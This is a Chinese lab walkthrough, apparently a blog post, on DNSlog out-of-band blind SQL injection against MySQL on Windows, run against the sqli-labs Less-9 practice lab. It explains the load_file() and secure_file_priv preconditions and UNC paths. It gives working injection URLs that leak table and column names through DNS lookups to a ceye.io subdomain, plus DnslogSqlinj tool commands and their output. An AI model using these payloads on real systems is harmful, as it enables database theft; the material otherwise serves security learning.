我遇到了两个巨坑，加上http://ceye.io/，经常无法访问，记录一下心酸的踩坑历史。

直接将两个巨坑放到最前面，提醒后人！！

1. sql盲注，后端数据库用的mysql数据库，说一下用dnslog回显只能用于windows系统，原理就是''代表Microsoft Windows通用命名约定（UNC）的文件和目录路径格式利用任何以下扩展存储程序引发DNS地址解析。双斜杠表示网络资源路径多加两个就是转义了反斜杠。

2. 通过DNSlog盲注需要用的load_file()函数，所以一般得是root权限。show variables like '%secure%';查看load_file()可以读取的磁盘。

1、当secure_file_priv为空，就可以读取磁盘的目录。
2、当secure_file_priv为G:，就可以读取G盘的文件。
3、当secure_file_priv为null，load_file就不能加载文件。
我当初的：直接在centos上进行测试，之后在win10上测试的时候没有使用这个函数进行查看。
直接被自己蠢哭.... ...

通过设置my.ini来配置。secure_file_priv=""就是可以load_flie任意磁盘的文件。先简单介绍一下原理：

关于OOB
out-of-band带外数据（OOB）与inband相反，它是一种通过其他传输方式来窃取数据的技术（例如利用DNS解析协议和电子邮件）。OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求，然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则，即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器（DNS）中提取数据，则被认为是最隐蔽有效的方法。

DNSlog在Web漏洞利用简单理解就是在某些无法直接利用漏洞获得回显的情况下，但是目标可以发起DNS请求，这个时候就可以通过这种方式把想获得的数据外带出来。

这里使用的DNS的原因是：DNS在解析的时候会留下日志，咱们这个就是读取多级域名的解析日志，来获取信息 简单来说就是把信息放在高级域名中，传递到自己这，然后读取日志，获取信息。

上张图：

所以，首先需要一个域名http://abc.com，之后访问xxx.abccom，dns服务会将此解析放入log记录中，之后就可以通过log记录获取之前的查询信息。

这里推荐生成域名的平台http://www.ceye.io，我使用的时候经常连接被重置，不知道为啥

注册完成后

实现条件（如上）

1、SQL盲注、无回显的命令执行、无回显的SSRF 2、只能用于windows系统 3、需要用到mysql中的load_file()函数，在Mysql中，load_file()函数读取一个文件并将其内容作为字符串返回。（不绝对，仅仅只是列举了mysql数据库的函数）

再介绍一下UNC

UNC路径
什么是UNC路径？
UNC是一种命名惯例, 主要用于在Microsoft Windows上指定和映射网络驱动器. UNC命名惯例最多被应用于在局域网中访问文件服务器或者打印机。我们日常常用的网络共享文件就是这个方式。
UNC路径就是类似softer这样的形式的网络路径。它符合 servernamesharename 格式，其中 servername 是服务器名，sharename 是共享资源的名称。
目录或文件的 UNC 名称可以包括共享名称下的目录路径，格式为：servernamesharenamedirectoryfilename。
例如把自己电脑的文件共享，你会获得如下路径，这就是UNC路径
//iZ53sl3r1890u7Z/Users/Administrator/Desktop/111.txt

配置完成后开始注入

这样配置完成后，在数据库中进行测试，dnslog被记录下来的。

使用load_file()这个函数支持对外的读取，所以拼接payload。下面就可以进行愉快的sql注入了

dnslog被记录下来的。
使用load_file()这个函数支持对外的读取，所以拼接payload。下面就可以进行愉快的sql注入了

成功爆出数据库名，下面继续爆数据表名

http://192.168.64.152/sqli-labs/Less-9/?id=-1' and if((select load_file(concat('',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.XXXXX.ceye.ioabc'))),1,0)--+

继续爆列名

http://192.168.64.152/sqli-labs/Less-9/?id=-1' and if((select load_file(concat('',(select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),'.XXXXX.ceye.ioabc'))),1,0)--+

最后直接爆数据，大功告成！

DNS注入工具:DnslogSqlinj

可以直接在github上下，https://github.com/ADOOO/DnslogSqlinj，需要py2的环境来运行

下载完成后直接解压

will@kali:~$ unzip DnslogSqlinj-master.zip
will@kali:~$ cd DnslogSqlinj-master/
will@kali:~/DnslogSqlinj-master$ ls
checkSql.py  checkSql.pyc  config.py  config.pyc  dnslogSql.py  README.md
will@kali:~/DnslogSqlinj-master$ vim config.py注意，这里要修改这两个为你自己的# DNSlog 设置APItoken = 'xxxxx'DNSurl = 'xxx'修改完成后保存
will@kali:~/DnslogSqlinj-master$ sudo python dnslogSql.py
____________________________________________________________________            _                   _____       _ |  __           | |                 |_   _|     (_)| |  | |_ __  ___| |     ___   __ _    | |  _ __  _ | |  | | '_ / __| |    / _  / _` |   | | | '_ | || |__| | | | __  |___| (_) | (_| |  _| |_| | | | ||_____/|_| |_|___/_________/ __, | |_____|_| |_| |__/ |            _/ ||___/            |__/
​DnsLog SqlInj Scanner by ADOVersion 1.0https://github.com/ADOOO/DnslogSqlinj
_______________________________________________________________
​
Usage: dnslogSql.py [options] -u http://10.1.1.9/sqli-labs/Less-9/?id=1' and ({})--+
​
Options:--version             show program's version number and exit-h, --help            show this help message and exit-u URL, --url=URL     target include injection-c, --check           task name-n TASKNAME, --name=TASKNAMEtask name-t THREAD_COUNT, --thread=THREAD_COUNTthread_count-i INF, --inf=INF     Testing target and Try to get information--dbs                 get database-D DB                 database name--tables              get table-T TABLE              table name--columns             get column-C COLUMN             column name--dump                get data
根据提示，配置参数，如下
will@kali:~/DnslogSqlinj-master$ sudo python dnslogSql.py -u "http://192.168.64.152/sqli-labs/Less-9/?id=1' and ({})--+"
​
[!]Testing Target and Try to get current information!
​
[*]Current user:        root@localhost
[*]Current data:        security
得到数据库名和用户名（在平台中也能看到记录，但是是数字和一些英文，木有看懂）

继续获取对应数据库下面的数据表

will@kali:~/DnslogSqlinj-master$ sudo python dnslogSql.py -u "http://192.168.64.152/sqli-labs/Less-9/?id=1' and ({})--+" -D "security" --tables
​
[*]Database:security
[*]Get data count: 4
[*]Data 2:      referers
[*]Data 4:      users
[*]Data 3:      uagents
[*]Data 1:      emails

然后继续爆字段，爆数据

PS：写的逻辑有些混乱，web萌新，多多包涵。
参考：还有其他很多

DNS log注入​www.jianshu.com